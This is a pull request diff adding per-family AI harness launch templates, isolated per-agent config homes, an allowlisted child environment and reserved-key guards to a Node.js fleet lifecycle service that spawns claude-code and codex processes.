### PR TITLE
feat(fleet): per-family harness launch templates + per-agent child env (#14914)

### DIFF
--- a/ai/config.template.mjs
+++ b/ai/config.template.mjs
@@ -51,6 +51,35 @@ class Config extends ConfigProvider {
              */
             wakeDaemonHeartbeatAlivePath: leaf(path.resolve(neoRootDir, '.neo-ai-data/wake-daemon/heartbeat.alive'), 'NEO_HEARTBEAT_ALIVE_PATH', 'string'),
             /**
+             * Fleet Manager supervision leaves: where per-agent harness instance homes live and
+             * which binary each harness family launches. The lifecycle service reads these at the
+             * use site (`FleetLifecycleService.getInstanceRoot` / `getHarnessBinaryPath`) — the
+             * SSOT owning default + env binding; the service holds no default shadow.
+             */
+            fleet: {
+                /**
+                 * Absolute root under which per-agent isolated harness config/state homes
+                 * (`CODEX_HOME` / `CLAUDE_CONFIG_DIR`) are derived — the sibling of the managed
+                 * checkouts root.
+                 * @type {string}
+                 */
+                instanceRoot   : leaf(path.resolve(neoRootDir, '.neo-ai-data/fleet/instances'), 'NEO_FLEET_INSTANCE_ROOT', 'string'),
+                harnessBinaries: {
+                    /**
+                     * The claude-code harness binary — PATH-resolved by default.
+                     * @type {string}
+                     */
+                    claudeCode: leaf('claude', 'NEO_FLEET_CLAUDE_CODE_BIN', 'string'),
+                    /**
+                     * The codex harness binary. The default is the ChatGPT-app-bundled CLI — an
+                     * alpha channel that self-updates with its app; production fleets pin this
+                     * leaf, and the lifecycle status's `binaryVersion` surfaces what actually ran.
+                     * @type {string}
+                     */
+                    codex: leaf('/Applications/ChatGPT.app/Contents/Resources/codex', 'NEO_FLEET_CODEX_BIN', 'string')
+                }
+            },
+            /**
              * Global debug flag for all AI processes.
              * @type {boolean}
              */

--- a/ai/services/fleet/FleetLifecycleService.mjs
+++ b/ai/services/fleet/FleetLifecycleService.mjs
@@ -1,12 +1,43 @@
-import {spawn}           from 'child_process';
-import Base              from '../../../src/core/Base.mjs';
-import FleetRegistryService from './FleetRegistryService.mjs';
+import {spawn}                   from 'child_process';
+import path                      from 'path';
+import {fileURLToPath}           from 'url';
+import Base                      from '../../../src/core/Base.mjs';
+import {deriveAgentInstanceHome} from './deriveAgentInstanceHome.mjs';
+import {deriveHarnessLaunchSpec} from './deriveHarnessLaunchSpec.mjs';
+import FleetRegistryService      from './FleetRegistryService.mjs';
+
+const
+    __filename = fileURLToPath(import.meta.url),
+    __dirname  = path.dirname(__filename);
 
 // The forced-projection env var is a CROSS-PROCESS CONTRACT: the FM sets it on the spawned child env,
 // and the Neural Link server's `resolveToolProjectionMode` reads this exact name as the fallback to
 // `--tool-projection-mode`. Intentionally NOT a configurable field — an override would set a var the
 // NL server never reads, silently dropping the forced read-only projection (fail-OPEN).
 const TOOL_PROJECTION_MODE_ENV_VAR = 'NEO_NL_TOOL_PROJECTION_MODE';
+
+// The agent-identity env var is a CROSS-PROCESS CONTRACT too: the MCP identity resolution chain
+// (`RequestContextService`, `Orchestrator`, `KbAlertingService`, `assertExpectedIdentity`) reads this
+// exact name, so the FM injects the fleet agent id under it — the spawned harness binds to the agent
+// the FM defined, never to whichever ambient identity the FM process happens to carry. Intentionally
+// NOT configurable — an override would set a var those consumers never read (fail-OPEN).
+const AGENT_IDENTITY_ENV_VAR = 'NEO_AGENT_IDENTITY';
+
+// Per-family harness binary env overrides + defaults — the env/default halves of the
+// `getHarnessBinaryPath` field → env → default resolution (the `FleetManager.getManagedRoot`
+// precedent, per family). The codex default is the ChatGPT-app-bundled CLI — an ALPHA channel that
+// self-updates with its app (V-B-A'd locally: `codex-cli 0.144.0-alpha.4`) — a deliberate,
+// version-guarded operator-convenience fallback, NOT a stability guarantee: production fleets pin
+// via the env var or the `harnessBinaryPaths` field. The claude-code default is the PATH-resolved
+// `claude` binary. An unknown family has no entry — `resolveLaunch` fails loud instead of guessing.
+const HARNESS_BINARY_ENV_VARS = {
+    'claude-code': 'NEO_FLEET_CLAUDE_CODE_BIN',
+    'codex'      : 'NEO_FLEET_CODEX_BIN'
+};
+const HARNESS_BINARY_DEFAULTS = {
+    'claude-code': 'claude',
+    'codex'      : '/Applications/ChatGPT.app/Contents/Resources/codex'
+};
 
 /**
  * @class Neo.ai.services.fleet.FleetLifecycleService
@@ -19,9 +50,26 @@ const TOOL_PROJECTION_MODE_ENV_VAR = 'NEO_NL_TOOL_PROJECTION_MODE';
  * `start` / `stop` / `restart` / `status` / `listRunning` for the external harness process.
  *
  * It composes the registry: `start(id)` resolves the agent definition and (via the Brain-internal
- * `resolveCredential`) the PAT, then spawns the harness command. The launch command itself comes
- * from the agent's `metadata.launch = {command, args}` — `harnessType` is classification, not a
- * launcher, so this service never guesses a brittle per-type command.
+ * `resolveCredential`) the PAT, then spawns the harness command. Launch resolution has two forms
+ * (see {@link resolveLaunch}):
+ * - **Curated intent (the normal form):** no `metadata.launch` + a templated `harnessType` ⇒ the
+ *   spec is derived internally — {@link Neo.ai.services.fleet.deriveAgentInstanceHome} keys an
+ *   isolated per-agent harness home (by agent **id**, never `githubUsername`) under the resolved
+ *   {@link getInstanceRoot}, and {@link Neo.ai.services.fleet.deriveHarnessLaunchSpec} maps it onto
+ *   the family template with the {@link getHarnessBinaryPath}-resolved binary. `harnessType` stays
+ *   classification: the registry payload never carries a command.
+ * - **Raw launch (SECURITY STOP-LINE — Brain/operator-only COMPATIBILITY path):** an explicit
+ *   `metadata.launch = {command, args, env}` is honored as-is. It executes an ARBITRARY command in
+ *   a credential-bearing child (the PAT + Bridge token ride that env), so it must NEVER become the
+ *   Body-reachable normal form — a pane-supplied command string would be remote code execution with
+ *   credentials attached.
+ *
+ * **`metadata.launch.env` contract surface:** an optional plain Object of string values, merged onto
+ * the fresh `{...process.env}` child-env copy BEFORE the reserved injections below — so the reserved
+ * keys always win — and a `launch.env` key naming a reserved slot (`credentialEnvVar`,
+ * `bridgeTokenEnvVar`, `NEO_NL_TOOL_PROJECTION_MODE`, `NEO_AGENT_IDENTITY`) is rejected fail-fast,
+ * naming the colliding key. Template-derived launches use the same merge path for their isolation
+ * var (`CODEX_HOME` / `CLAUDE_CONFIG_DIR`).
  *
  * **Credential security boundary** (inherited from the registry's two-hemisphere rule): the PAT is
  * injected into the spawned **child's environment only** — copied onto a fresh `{...process.env}`
@@ -33,11 +81,14 @@ const TOOL_PROJECTION_MODE_ENV_VAR = 'NEO_NL_TOOL_PROJECTION_MODE';
  *
  * **Harness-auth provisioning at spawn:** every FM-spawned agent is an *embedded* agent, so `start`
  * provisions its harness-auth surfaces into the child env: (1) a freshly-minted Bridge token for the
- * agent↔Neural-Link-Bridge handshake, and (2) the forced read-only Neural Link tool-projection
+ * agent↔Neural-Link-Bridge handshake, (2) the forced read-only Neural Link tool-projection
  * (`toolProjectionMode`, default `harness-embedded`) under the FIXED `NEO_NL_TOOL_PROJECTION_MODE` var
  * (a cross-process contract, intentionally NOT configurable — an override would set a var the NL server
- * never reads → fail-OPEN) — the NL server reads it as a fallback to its `--tool-projection-mode` flag.
- * Fail-closed by construction: an FM-spawned agent never receives the full developer tool surface.
+ * never reads → fail-OPEN) — the NL server reads it as a fallback to its `--tool-projection-mode` flag,
+ * and (3) the fleet agent id under the FIXED `NEO_AGENT_IDENTITY` var (the same cross-process-contract
+ * rationale — the MCP identity resolution chain reads that exact name), so the child's identity binds
+ * to the agent the FM defined by construction. Fail-closed: an FM-spawned agent never receives the
+ * full developer tool surface, and `launch.env` can never pre-load a reserved slot.
  *
  * **Supervision idiom** mirrors `ai/daemons/orchestrator/services/ProcessSupervisorService` (the
  * injectable `spawnFn` test seam, env-merge, graceful `SIGTERM`→`SIGKILL` stop, and draining the
@@ -90,6 +141,23 @@ class FleetLifecycleService extends Base {
     toolProjectionMode = 'harness-embedded'
 
     /**
+     * The absolute per-agent harness instance-home root — where the isolated harness config/state
+     * homes (`CODEX_HOME` / `CLAUDE_CONFIG_DIR`) of template-launched agents are derived. `null` ⇒
+     * resolved (env, then a `__dirname`-relative default) via {@link getInstanceRoot} — the
+     * `FleetManager.getManagedRoot` precedent. Set a per-tenant / temp path to override.
+     * @member {String|null} instanceRoot=null
+     */
+    instanceRoot = null
+
+    /**
+     * Per-harness-family binary-path overrides, keyed by `harnessType` (e.g. `{codex: '/opt/codex'}`).
+     * `null` / missing key ⇒ resolved (per-family env, then the per-family default) via
+     * {@link getHarnessBinaryPath}.
+     * @member {Object|null} harnessBinaryPaths=null
+     */
+    harnessBinaryPaths = null
+
+    /**
      * Grace period after `SIGTERM` before `stop` escalates to `SIGKILL`.
      * @member {Number} sigkillTimeoutMs=5000
      */
@@ -136,22 +204,35 @@ class FleetLifecycleService extends Base {
         const agent = this.getRegistry().getAgent(id);
         if (!agent) throw new Error(`FleetLifecycleService.start: unknown agent '${id}'.`);
 
-        const {command, args} = this.resolveLaunch(agent);
+        const {command, args, env: launchEnv} = this.resolveLaunch(agent);
 
-        // Env-key contract guard (fail-fast): each credential class occupies a DISTINCT child-env slot.
+        // Env-key contract guard (fail-fast): each reserved class occupies a DISTINCT child-env slot.
         // The PAT + Bridge-token keys are configurable, so a misconfiguration that collides two (e.g.
         // bridgeTokenEnvVar === credentialEnvVar) would write one credential then overwrite it with the
         // other — collapsing the distinct-credential-class boundary (the Bridge token lands in the PAT
-        // slot), or stomping the forced-projection var. Reject BEFORE injecting any secret; never spawn
-        // under a broken env contract.
-        const envKeys = [this.credentialEnvVar, this.bridgeTokenEnvVar, TOOL_PROJECTION_MODE_ENV_VAR];
+        // slot), or stomping the forced-projection / agent-identity vars. Reject BEFORE injecting any
+        // secret; never spawn under a broken env contract.
+        const envKeys = [this.credentialEnvVar, this.bridgeTokenEnvVar, TOOL_PROJECTION_MODE_ENV_VAR, AGENT_IDENTITY_ENV_VAR];
         if (envKeys.some(key => !key) || new Set(envKeys).size !== envKeys.length) {
-            throw new Error(`FleetLifecycleService.start: env-key contract violated — credentialEnvVar, bridgeTokenEnvVar, and the forced-projection var must be non-empty and pairwise distinct (got ${JSON.stringify(envKeys)}).`);
+            throw new Error(`FleetLifecycleService.start: env-key contract violated — credentialEnvVar, bridgeTokenEnvVar, the forced-projection var, and the agent-identity var must be non-empty and pairwise distinct (got ${JSON.stringify(envKeys)}).`);
         }
 
-        // Secret handling: copy the parent env (never mutate process.env), inject the PAT — if any —
-        // under credentialEnvVar. Absent credential → start without it (a tokenless agent is valid).
-        const env = {...process.env},
+        // The launch env may not name a reserved slot: allowing it would either let registry-authored
+        // data pre-load a secret / identity slot, or be silently clobbered by the reserved injections
+        // below. Neither may happen silently — fail fast, naming the colliding key, BEFORE any secret
+        // is minted or injected.
+        for (const key of Object.keys(launchEnv)) {
+            if (envKeys.includes(key)) {
+                throw new Error(`FleetLifecycleService.start: launch env key '${key}' collides with a reserved env slot for agent '${id}' (reserved: ${JSON.stringify(envKeys)}).`);
+            }
+        }
+
+        // Secret handling: copy the parent env (never mutate process.env), merge the agent's launch
+        // env (its isolated harness home — `CODEX_HOME` / `CLAUDE_CONFIG_DIR` — plus any compat-path
+        // extras) BEFORE the reserved injections so the reserved keys always win, then inject the
+        // PAT — if any — under credentialEnvVar. Absent credential → start without it (a tokenless
+        // agent is valid).
+        const env = {...process.env, ...launchEnv},
               pat = this.getRegistry().resolveCredential(id);
         if (pat != null) env[this.credentialEnvVar] = pat;
 
@@ -167,6 +248,13 @@ class FleetLifecycleService extends Base {
         // FIXED env var (a cross-process contract, not configurable) as a fallback to its
         // --tool-projection-mode flag.
         env[TOOL_PROJECTION_MODE_ENV_VAR] = this.toolProjectionMode;
+
+        // Agent identity: every FM-spawned harness carries its fleet agent id under the FIXED
+        // NEO_AGENT_IDENTITY var (a cross-process contract — the MCP identity resolution chain reads
+        // this exact name), so the child binds to the agent the FM defined — never to whichever
+        // ambient identity the FM process happens to carry. Reserved class #4: launch.env can never
+        // pre-load it (guard above).
+        env[AGENT_IDENTITY_ENV_VAR] = id;
 
         // The child's working directory: the agent's provisioned repo checkout when the caller supplies
         // it (the Fleet Manager turnkey path via startAgentProvisioned). Omitted ⇒ inherit this process's
@@ -302,18 +390,87 @@ class FleetLifecycleService extends Base {
     // ---- internals ----------------------------------------------------------
 
     /**
-     * Resolve the launch command for an agent from its `metadata.launch`. `harnessType` classifies
-     * an agent; it does not encode a launch command, so a launch spec is required here.
+     * Resolve the launch spec for an agent — command + args + per-agent launch env.
+     *
+     * **Normal form — curated intent:** no `metadata.launch` + a templated `harnessType` ⇒ the spec
+     * is derived internally: {@link Neo.ai.services.fleet.deriveAgentInstanceHome} keys an isolated
+     * instance home (by agent **id**, never `githubUsername`) under {@link getInstanceRoot}, and
+     * {@link Neo.ai.services.fleet.deriveHarnessLaunchSpec} maps it onto the family template with
+     * the {@link getHarnessBinaryPath}-resolved binary. Nothing registry-authored is executed —
+     * `harnessType` stays classification. An untemplated `harnessType` with no launch spec throws
+     * (fail-closed; this service never guesses a brittle command).
+     *
+     * **SECURITY STOP-LINE — the raw-launch compatibility path:** an explicit `metadata.launch =
+     * {command, args, env}` is honored as-is, but it executes an ARBITRARY command in a
+     * credential-bearing child (the PAT + Bridge token ride that env). It is a Brain/operator-only
+     * COMPATIBILITY surface and must NEVER become the Body-reachable normal form — a pane-supplied
+     * command string would be remote code execution with credentials attached.
+     *
+     * The optional `launch.env` (a plain Object of string values) is shape-validated here; {@link
+     * start} merges it onto the child env BEFORE the reserved injections (reserved keys always win)
+     * and rejects any reserved-key collision fail-fast.
      * @param {Object} agent
-     * @returns {{command: String, args: String[]}}
+     * @returns {{command: String, args: String[], env: Object}}
      * @private
      */
     resolveLaunch(agent) {
         const launch = agent.metadata?.launch;
-        if (!launch?.command) {
+
+        if (!launch) {
+            // Curated-intent fallback: classification (harnessType) + the config-resolved instance
+            // root / binary path decide the launch — the registry payload contributes no command.
+            const binaryPath = this.getHarnessBinaryPath(agent.harnessType);
+            if (!binaryPath) {
+                throw new Error(`FleetLifecycleService: agent '${agent.id}' (harnessType '${agent.harnessType}') has no launch spec and no built-in launch template. Set metadata.launch = {command, args} or use a templated harnessType.`);
+            }
+            return deriveHarnessLaunchSpec({
+                harnessType : agent.harnessType,
+                instanceHome: deriveAgentInstanceHome({instanceRoot: this.getInstanceRoot(), agentId: agent.id, harnessType: agent.harnessType}),
+                binaryPath
+            });
+        }
+
+        if (!launch.command) {
             throw new Error(`FleetLifecycleService: agent '${agent.id}' (harnessType '${agent.harnessType}') has no launch spec. Set metadata.launch = {command, args}.`);
         }
-        return {command: launch.command, args: Array.isArray(launch.args) ? launch.args : []};
+
+        const env = launch.env ?? {};
+        if (typeof env !== 'object' || Array.isArray(env)) {
+            throw new Error(`FleetLifecycleService: agent '${agent.id}' has an invalid metadata.launch.env — expected a plain Object of string values.`);
+        }
+        for (const [key, value] of Object.entries(env)) {
+            if (typeof value !== 'string') {
+                throw new Error(`FleetLifecycleService: agent '${agent.id}' has an invalid metadata.launch.env — '${key}' must map to a String value.`);
+            }
+        }
+
+        return {command: launch.command, args: Array.isArray(launch.args) ? launch.args : [], env};
+    }
+
+    /**
+     * @summary Resolve (field > env > default) the absolute per-agent harness instance-home root.
+     * Mirrors `FleetManager.getManagedRoot`: the `instanceRoot` field, then the
+     * `NEO_FLEET_INSTANCE_ROOT` env, then a `__dirname`-relative
+     * `<repoRoot>/.neo-ai-data/fleet/instances` default — the sibling of the managed checkouts root.
+     * No hidden fallback — an unset field + unset env yields exactly the default.
+     * @returns {String}
+     */
+    getInstanceRoot() {
+        return this.instanceRoot || process.env.NEO_FLEET_INSTANCE_ROOT || path.resolve(__dirname, '../../../.neo-ai-data/fleet/instances');
+    }
+
+    /**
+     * @summary Resolve (field > env > default) the harness binary path for one harness family —
+     * the same three-layer shape as {@link getInstanceRoot}, per family: the `harnessBinaryPaths`
+     * field entry, then the family env var (`NEO_FLEET_CODEX_BIN` / `NEO_FLEET_CLAUDE_CODE_BIN`),
+     * then the family default. The codex default is the ChatGPT-app-bundled CLI — an alpha channel
+     * that self-updates with its app, so production fleets pin via the env var or the field. An
+     * untemplated family resolves `null` — {@link resolveLaunch} fails loud rather than guessing.
+     * @param {String} harnessType
+     * @returns {String|null}
+     */
+    getHarnessBinaryPath(harnessType) {
+        return this.harnessBinaryPaths?.[harnessType] || process.env[HARNESS_BINARY_ENV_VARS[harnessType]] || HARNESS_BINARY_DEFAULTS[harnessType] || null;
     }
 
     /**

--- a/ai/services/fleet/FleetLifecycleService.mjs
+++ b/ai/services/fleet/FleetLifecycleService.mjs
@@ -1,14 +1,11 @@
-import {spawn}                   from 'child_process';
+import {execFile, spawn}         from 'child_process';
+import fs                        from 'fs';
 import path                      from 'path';
-import {fileURLToPath}           from 'url';
+import AiConfig                  from '../../config.mjs';
 import Base                      from '../../../src/core/Base.mjs';
 import {deriveAgentInstanceHome} from './deriveAgentInstanceHome.mjs';
 import {deriveHarnessLaunchSpec} from './deriveHarnessLaunchSpec.mjs';
 import FleetRegistryService      from './FleetRegistryService.mjs';
-
-const
-    __filename = fileURLToPath(import.meta.url),
-    __dirname  = path.dirname(__filename);
 
 // The forced-projection env var is a CROSS-PROCESS CONTRACT: the FM sets it on the spawned child env,
 // and the Neural Link server's `resolveToolProjectionMode` reads this exact name as the fallback to
@@ -23,20 +20,34 @@ const TOOL_PROJECTION_MODE_ENV_VAR = 'NEO_NL_TOOL_PROJECTION_MODE';
 // NOT configurable — an override would set a var those consumers never read (fail-OPEN).
 const AGENT_IDENTITY_ENV_VAR = 'NEO_AGENT_IDENTITY';
 
-// Per-family harness binary env overrides + defaults — the env/default halves of the
-// `getHarnessBinaryPath` field → env → default resolution (the `FleetManager.getManagedRoot`
-// precedent, per family). The codex default is the ChatGPT-app-bundled CLI — an ALPHA channel that
-// self-updates with its app (V-B-A'd locally: `codex-cli 0.144.0-alpha.4`) — a deliberate,
-// version-guarded operator-convenience fallback, NOT a stability guarantee: production fleets pin
-// via the env var or the `harnessBinaryPaths` field. The claude-code default is the PATH-resolved
-// `claude` binary. An unknown family has no entry — `resolveLaunch` fails loud instead of guessing.
-const HARNESS_BINARY_ENV_VARS = {
-    'claude-code': 'NEO_FLEET_CLAUDE_CODE_BIN',
-    'codex'      : 'NEO_FLEET_CODEX_BIN'
+// The AiConfig `fleet.harnessBinaries` leaf key per harness family. An unknown family has no
+// entry — `resolveLaunch` fails loud instead of guessing a command for it.
+const HARNESS_BINARY_LEAF_KEYS = {
+    'claude-code': 'claudeCode',
+    'codex'      : 'codex'
 };
-const HARNESS_BINARY_DEFAULTS = {
-    'claude-code': 'claude',
-    'codex'      : '/Applications/ChatGPT.app/Contents/Resources/codex'
+
+// The ONLY ambient parent-env vars that cross into a spawned harness. The FM's own environment
+// carries operator secrets (provider API keys, tokens, session vars) that must never leak into
+// every peer: a tokenless instance silently inheriting the parent's `GH_TOKEN` would collapse the
+// per-agent credential boundary. Benign process-runtime vars only; everything else a child needs
+// arrives explicitly via the launch template or the reserved injections in `start`.
+const AMBIENT_ENV_ALLOWLIST = Object.freeze([
+    'HOME', 'LANG', 'LC_ALL', 'LOGNAME', 'PATH', 'SHELL', 'TERM', 'TMPDIR', 'USER'
+]);
+
+// Env keys that would mutate the merge target's prototype chain instead of (or in addition to)
+// defining an own property — a registry-authored `{"__proto__": …}` must be rejected, never
+// assigned. JSON.parse creates these as OWN keys, so they DO survive into Object.entries.
+const PROTO_ENV_KEYS = Object.freeze(['__proto__', 'constructor', 'prototype']);
+
+// Per-family auth-marker files inside an instance home: present ⇒ the home has completed its
+// operator-owned per-home login; absent ⇒ `authRequired` surfaces `true` so the cockpit shows the
+// onboarding step honestly. A HEURISTIC on documented CLI state layouts, not a credential read —
+// the marker's presence is checked, never its content.
+const HARNESS_AUTH_MARKERS = {
+    'claude-code': '.credentials.json',
+    'codex'      : 'auth.json'
 };
 
 /**
@@ -58,21 +69,29 @@ const HARNESS_BINARY_DEFAULTS = {
  *   {@link getInstanceRoot}, and {@link Neo.ai.services.fleet.deriveHarnessLaunchSpec} maps it onto
  *   the family template with the {@link getHarnessBinaryPath}-resolved binary. `harnessType` stays
  *   classification: the registry payload never carries a command.
- * - **Raw launch (SECURITY STOP-LINE — Brain/operator-only COMPATIBILITY path):** an explicit
- *   `metadata.launch = {command, args, env}` is honored as-is. It executes an ARBITRARY command in
- *   a credential-bearing child (the PAT + Bridge token ride that env), so it must NEVER become the
- *   Body-reachable normal form — a pane-supplied command string would be remote code execution with
- *   credentials attached.
+ * - **Raw launch (SECURITY STOP-LINE — Brain/operator-only by CONSTRUCTION):** an explicit
+ *   `metadata.launch = {command, args, env}` executes an ARBITRARY command in a credential-bearing
+ *   child (the PAT + Bridge token ride that env). The wire cannot author it: the registry's
+ *   `defineAgent` / `updateAgent` REJECT a `launch` key in metadata, so the only write path is the
+ *   registry-internal `setLaunchOverride` — a method that exists on no bridge and no wire allowlist.
+ *   Wire callers send curated `harnessType` intent, nothing more.
  *
- * **`metadata.launch.env` contract surface:** an optional plain Object of string values, merged onto
- * the fresh `{...process.env}` child-env copy BEFORE the reserved injections below — so the reserved
- * keys always win — and a `launch.env` key naming a reserved slot (`credentialEnvVar`,
- * `bridgeTokenEnvVar`, `NEO_NL_TOOL_PROJECTION_MODE`, `NEO_AGENT_IDENTITY`) is rejected fail-fast,
- * naming the colliding key. Template-derived launches use the same merge path for their isolation
- * var (`CODEX_HOME` / `CLAUDE_CONFIG_DIR`).
+ * **Supervision transport (the topology that keeps a CLI harness alive):** children spawn with
+ * `stdio: ['pipe', 'ignore', 'pipe']` — stdin is a HELD-OPEN pipe, because both supported harness
+ * CLIs exit immediately on an EOF'd/ignored stdin (probed on the exact binaries: codex `app-server`
+ * and claude-code stream-json both stay alive on a held pipe and exit without it). The launch
+ * templates pin the per-family long-lived mode args; stdout is discarded until a protocol consumer
+ * lands; stderr is drained byte-counted as below.
+ *
+ * **Child env (minimal by construction):** the child receives ONLY the `AMBIENT_ENV_ALLOWLIST`
+ * process-runtime vars — never a full parent-env copy, so ambient operator secrets cannot leak into
+ * a peer — plus the launch spec's own env (its isolation home var), plus the reserved injections.
+ * A `launch.env` key naming a reserved slot (`credentialEnvVar`, `bridgeTokenEnvVar`,
+ * `NEO_NL_TOOL_PROJECTION_MODE`, `NEO_AGENT_IDENTITY`) or a prototype-mutating key
+ * (`__proto__` / `constructor` / `prototype`) is rejected fail-fast, naming the offending key.
  *
  * **Credential security boundary** (inherited from the registry's two-hemisphere rule): the PAT is
- * injected into the spawned **child's environment only** — copied onto a fresh `{...process.env}`
+ * injected into the spawned **child's environment only** — onto the minimal allowlisted env above
  * (the parent env is never mutated), under a configurable var (`credentialEnvVar`, default
  * `GH_TOKEN`). It is **never** placed in `argv` (visible in `ps`), never written to the tracked
  * process record, and never logged. A status read can never surface a secret because the records
@@ -143,16 +162,16 @@ class FleetLifecycleService extends Base {
     /**
      * The absolute per-agent harness instance-home root — where the isolated harness config/state
      * homes (`CODEX_HOME` / `CLAUDE_CONFIG_DIR`) of template-launched agents are derived. `null` ⇒
-     * resolved (env, then a `__dirname`-relative default) via {@link getInstanceRoot} — the
-     * `FleetManager.getManagedRoot` precedent. Set a per-tenant / temp path to override.
+     * the AiConfig `fleet.instanceRoot` leaf (the config SSOT owning default + env binding).
+     * The field is the explicit test / per-tenant override seam, never a default shadow.
      * @member {String|null} instanceRoot=null
      */
     instanceRoot = null
 
     /**
      * Per-harness-family binary-path overrides, keyed by `harnessType` (e.g. `{codex: '/opt/codex'}`).
-     * `null` / missing key ⇒ resolved (per-family env, then the per-family default) via
-     * {@link getHarnessBinaryPath}.
+     * `null` / missing key ⇒ the family's AiConfig `fleet.harnessBinaries.*` leaf (the config
+     * SSOT). The field is the explicit test / per-tenant override seam, never a default shadow.
      * @member {Object|null} harnessBinaryPaths=null
      */
     harnessBinaryPaths = null
@@ -204,7 +223,8 @@ class FleetLifecycleService extends Base {
         const agent = this.getRegistry().getAgent(id);
         if (!agent) throw new Error(`FleetLifecycleService.start: unknown agent '${id}'.`);
 
-        const {command, args, env: launchEnv} = this.resolveLaunch(agent);
+        const launch                          = this.resolveLaunch(agent),
+              {command, args, env: launchEnv} = launch;
 
         // Env-key contract guard (fail-fast): each reserved class occupies a DISTINCT child-env slot.
         // The PAT + Bridge-token keys are configurable, so a misconfiguration that collides two (e.g.
@@ -227,13 +247,21 @@ class FleetLifecycleService extends Base {
             }
         }
 
-        // Secret handling: copy the parent env (never mutate process.env), merge the agent's launch
-        // env (its isolated harness home — `CODEX_HOME` / `CLAUDE_CONFIG_DIR` — plus any compat-path
-        // extras) BEFORE the reserved injections so the reserved keys always win, then inject the
-        // PAT — if any — under credentialEnvVar. Absent credential → start without it (a tokenless
-        // agent is valid).
-        const env = {...process.env, ...launchEnv},
-              pat = this.getRegistry().resolveCredential(id);
+        // Child env: the MINIMAL allowlisted base — never a full parent-env copy. A tokenless
+        // instance must not silently inherit the parent's `GH_TOKEN` or provider secrets; only
+        // benign process-runtime vars cross the boundary (see AMBIENT_ENV_ALLOWLIST). The launch
+        // env (the isolation home var, plus any Brain-set compat extras) merges BEFORE the reserved
+        // injections so the reserved keys always win, then the PAT — if any — lands under
+        // credentialEnvVar. Absent credential → start without it (a tokenless agent is valid).
+        const env = {};
+        for (const key of AMBIENT_ENV_ALLOWLIST) {
+            if (process.env[key] !== undefined) env[key] = process.env[key];
+        }
+        for (const [key, value] of Object.entries(launchEnv)) {
+            env[key] = value;
+        }
+
+        const pat = this.getRegistry().resolveCredential(id);
         if (pat != null) env[this.credentialEnvVar] = pat;
 
         // Bridge token: a credential class DISTINCT from the PAT. Mint one + inject it under
@@ -256,10 +284,23 @@ class FleetLifecycleService extends Base {
         // pre-load it (guard above).
         env[AGENT_IDENTITY_ENV_VAR] = id;
 
+        // Executable preflight (fail-closed): a path-shaped command must exist BEFORE any secret is
+        // minted or a spawn attempted — a typo'd/missing binary fails loud here, not as a child
+        // 'error' event racing the first status read. Bare commands (e.g. `claude`) resolve via the
+        // child's PATH; the spawn itself asserts their existence.
+        if (command.includes('/') && !fs.existsSync(command)) {
+            throw new Error(`FleetLifecycleService.start: harness binary not found at '${command}' for agent '${id}'. Pin the AiConfig fleet.harnessBinaries leaf or the harnessBinaryPaths field to a real executable.`);
+        }
+
         // The child's working directory: the agent's provisioned repo checkout when the caller supplies
         // it (the Fleet Manager turnkey path via startAgentProvisioned). Omitted ⇒ inherit this process's
         // cwd — but an FM-spawned harness is meant to operate on ITS repo, not the Fleet Manager's dir.
-        const spawnOptions = {stdio: ['ignore', 'ignore', 'pipe'], env};
+        //
+        // stdio topology is the LIVENESS contract: stdin MUST be a held-open pipe — both supported
+        // harness CLIs treat ignored/EOF'd stdin as session-end and exit immediately (probed on the
+        // exact binaries; see the class summary). stdout is discarded until a protocol consumer
+        // lands; stderr is drained byte-counted below.
+        const spawnOptions = {stdio: ['pipe', 'ignore', 'pipe'], env};
         if (opts.cwd != null) spawnOptions.cwd = opts.cwd;
 
         let child;
@@ -270,8 +311,33 @@ class FleetLifecycleService extends Base {
             throw error;
         }
 
-        const record = {id, child, cwd: opts.cwd ?? null, pid: child.pid ?? null, state: 'running', startedAt: new Date().toISOString(), exitCode: null, signal: null, exitedAt: null, stderrBytes: 0};
+        const record = {
+            id, child,
+            cwd        : opts.cwd ?? null,
+            pid        : child.pid ?? null,
+            state      : 'running',
+            startedAt  : new Date().toISOString(),
+            exitCode   : null,
+            signal     : null,
+            exitedAt   : null,
+            stderrBytes: 0,
+            // Curated-launch observability: the family + isolated home let `status` compute the live
+            // per-home `authRequired` heuristic; null for raw-launch agents (unknown layout).
+            harnessType  : launch.instanceHome ? agent.harnessType : null,
+            instanceHome : launch.instanceHome ?? null,
+            binaryVersion: null
+        };
         this.processes.set(id, record);
+
+        // Best-effort version surface (the pin/verify half of the executable preflight): capture
+        // `<binary> --version` async onto the record — the status read surfaces what actually runs,
+        // so an app-bundle alpha channel that self-updated is VISIBLE, not silently different.
+        // Failure is non-fatal (version stays null); the probe never blocks the spawn path.
+        try {
+            execFile(command, ['--version'], {timeout: 3000}, (error, stdout) => {
+                if (!error && stdout) record.binaryVersion = String(stdout).trim().split('\n')[0].slice(0, 80);
+            });
+        } catch (ignored) {}
 
         // Drain stderr so a noisy harness can't block on a full pipe buffer. Retain only a byte
         // COUNT, never the content: the child's stderr is untrusted and may echo the injected PAT,
@@ -351,25 +417,49 @@ class FleetLifecycleService extends Base {
     }
 
     /**
-     * Status snapshot for one agent (never carries a secret — `stderrBytes` is a count, not content).
+     * Status snapshot for one agent (never carries a secret — `stderrBytes` is a count, not content;
+     * `authRequired` checks a marker file's PRESENCE, never its content).
      * @param {String} id
-     * @returns {Object} `{id, state, running, pid, startedAt, uptimeMs, exitCode, exitedAt, stderrBytes}`
+     * @returns {Object} `{id, state, running, pid, startedAt, uptimeMs, exitCode, exitedAt,
+     *     stderrBytes, authRequired, binaryVersion}` — `authRequired` is the LIVE per-home
+     *     auth-marker heuristic for curated launches (`true` = the operator-owned per-home login has
+     *     not happened yet; recomputed each read so a completed login flips it without a restart);
+     *     `null` for raw-launch / untracked agents. `binaryVersion` is the best-effort
+     *     `--version` capture of what actually ran (`null` until/unless the probe answered).
      */
     status(id) {
         const record = this.processes.get(id);
-        if (!record) return {id, state: 'stopped', running: false, pid: null, startedAt: null, uptimeMs: null, exitCode: null, exitedAt: null, stderrBytes: 0};
+        if (!record) return {id, state: 'stopped', running: false, pid: null, startedAt: null, uptimeMs: null, exitCode: null, exitedAt: null, stderrBytes: 0, authRequired: null, binaryVersion: null};
 
         return {
             id,
-            state       : record.state,
-            running     : record.state === 'running',
-            pid         : record.pid,
-            startedAt   : record.startedAt,
-            uptimeMs    : record.state === 'running' && record.startedAt ? Date.now() - Date.parse(record.startedAt) : null,
-            exitCode    : record.exitCode,
-            exitedAt    : record.exitedAt,
